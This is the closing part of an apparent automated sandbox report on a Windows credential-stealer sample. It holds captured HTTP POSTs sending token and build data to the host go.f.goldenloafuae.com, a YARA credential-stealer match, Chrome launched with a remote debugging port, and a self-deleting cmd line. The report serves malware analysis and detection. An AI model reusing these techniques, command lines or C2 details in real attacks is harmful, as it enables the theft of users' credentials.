                                                                                    2025-03-07 19:46:18 UTC16355OUTData Raw: 4d 2f 6e 54 32 38 45 4b 51 78 54 50 50 49 37 62 46 38 31 64 79 4c 77 70 4a 59 6a 73 41 65 68 50 51 5a 72 47 57 4a 70 52 33 6b 64 4d 4d 48 58 6e 38 4d 58 33 2b 52 31 4e 76 34 34 31 47 32 74 59 62 64 4c 65 30 4b 78 49 71 4b 57 56 73 6b 41 59 35 2b 61 70 50 38 41 68 50 38 41 56 50 38 41 6e 32 73 76 2b 2b 48 2f 41 50 69 71 35 46 6e 56 62 69 4f 4a 4a 6f 4a 42 4c 41 38 38 55 71 4f 64 6a 6f 69 73 7a 59 79 4d 67 6a 61 77 77 51 44 6b 56 48 50 64 77 51 36 65 31 31 39 72 74 5a 48 53 30 69 76 5a 4c 64 47 66 7a 45 68 6b 32 37 57 4f 55 43 6e 37 36 35 77 78 36 31 35 37 6f 5a 65 6e 5a 2f 6d 7a 32 59 34 72 4f 5a 62 58 2b 36 50 2b 58 6d 64 6a 2f 77 41 4a 39 71 76 2f 41 44 37 57 58 2f 66 44 2f 77 44 78 56 51 33 58 6a 62 55 37 75 7a 6e 74 6e 67 73 77 6b 30 62 52 73 56 52 73
                                                                                    Data Ascii: M/nT28EKQxTPPI7bF81dyLwpJYjsAehPQZrGWJpR3kdMMHXn8MX3+R1Nv441G2tYbdLe0KxIqKWVskAY5+apP8AhP8AVP8An2sv++H/APiq5FnVbiOJJoJBLA88UqOdjoiszYyMgjawwQDkVHPdwQ6e119rtZHS0ivZLdGfzEhk27WOUCn765wx6157oZenZ/mz2Y4rOZbX+6P+Xmdj/wAJ9qv/AD7WX/fD/wDxVQ3XjbU7uzntngswk0bRsVRs
                                                                                    2025-03-07 19:46:18 UTC7512OUTData Raw: 67 6a 4b 4b 4b 4b 38 51 36 6a 30 43 54 34 4e 65 4c 37 61 31 6a 75 4c 32 43 30 74 46 65 65 47 41 43 53 34 44 45 4e 4c 49 73 61 2f 63 33 63 62 6e 47 66 62 4e 64 56 5a 2f 73 36 36 6b 2b 50 74 76 69 43 30 68 39 66 49 67 61 58 2b 5a 57 76 53 2f 46 46 74 34 6e 58 53 59 44 4e 71 2b 6b 4f 6e 39 6f 32 49 41 54 53 35 46 4f 37 37 56 46 74 4f 54 63 48 67 48 42 49 37 67 45 5a 47 63 6a 61 2b 79 65 4c 50 2b 67 31 6f 76 2f 67 6f 6c 2f 77 44 6b 6d 73 75 5a 6d 36 70 71 35 38 59 55 55 55 56 71 59 48 32 7a 61 66 38 41 48 6c 42 2f 31 7a 58 2b 56 54 56 44 61 66 38 41 48 6c 42 2f 31 7a 58 2b 56 53 73 77 56 53 7a 45 42 51 4d 6b 6b 38 43 75 63 37 44 43 6d 31 32 2f 75 4c 36 34 74 64 45 30 70 4c 30 57 72 2b 58 50 50 63 58 50 6b 52 42 38 5a 4b 4b 51 72 46 6d 47 52 6e 67 41 5a 78 6e
                                                                                    Data Ascii: gjKKKK8Q6j0CT4NeL7a1juL2C0tFeeGACS4DENLIsa/c3cbnGfbNdVZ/s66k+PtviC0h9fIgaX+ZWvS/FFt4nXSYDNq+kOn9o2IATS5FO77VFtOTcHgHBI7gEZGcja+yeLP+g1ov/gol/wDkmsuZm6pq58YUUUVqYH2zaf8AHlB/1zX+VTVDaf8AHlB/1zX+VSswVSzEBQMkk8Cuc7DCm12/uL64tdE0pL0Wr+XPPcXPkRB8ZKKQrFmGRngAZxn
                                                                                    2025-03-07 19:46:20 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:46:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:46:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.44976395.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:46:22 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----c26ppph47qq1v3ohv3wt
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:46:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 63 32 36 70 70 70 68 34 37 71 71 31 76 33 6f 68 76 33 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 63 32 36 70 70 70 68 34 37 71 71 31 76 33 6f 68 76 33 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 63 32 36 70 70 70 68 34 37 71 71 31 76 33 6f 68 76 33 77 74 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------c26ppph47qq1v3ohv3wtContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------c26ppph47qq1v3ohv3wtContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------c26ppph47qq1v3ohv3wtCont
                                                                                    2025-03-07 19:46:23 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:46:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:46:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.44976495.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:46:26 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----v3wbai5x4ozmymg4oh4w
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:46:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 76 33 77 62 61 69 35 78 34 6f 7a 6d 79 6d 67 34 6f 68 34 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 76 33 77 62 61 69 35 78 34 6f 7a 6d 79 6d 67 34 6f 68 34 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 76 33 77 62 61 69 35 78 34 6f 7a 6d 79 6d 67 34 6f 68 34 77 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------v3wbai5x4ozmymg4oh4wContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------v3wbai5x4ozmymg4oh4wContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------v3wbai5x4ozmymg4oh4wCont
                                                                                    2025-03-07 19:46:27 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:46:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:46:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:14:45:08
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:DA8846245FB9EC49A3223F7731236C7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:14:45:39
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                    Imagebase:0x7ff786830000
                                                                                    File size:3'388'000 bytes
                                                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:14:45:39
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2220,i,9774722909908192130,17750005277753749404,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                    Imagebase:0x7ff659320000
                                                                                    File size:3'388'000 bytes
                                                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:14:46:26
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9h4wb" & exit
                                                                                    Imagebase:0xc70000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:14:46:26
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff62fc20000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:14:46:27
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:timeout /t 11
                                                                                    Imagebase:0xf70000
                                                                                    File size:25'088 bytes
                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >